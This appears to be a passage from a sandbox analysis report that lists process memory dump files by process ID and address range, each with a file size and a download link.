memory/2980-2017-0x0000000077780000-0x000000007789F000-memory.dmp

Filesize
1.1MB

Download
memory/2996-2002-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2003-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2010-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2008-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2009-0x0000000000050000-0x0000000000070000-memory.dmp

Filesize
128KB

Download
memory/2996-2004-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2014-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2011-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2013-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2005-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2006-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2012-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2996-2007-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3064-1968-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/3064-1969-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download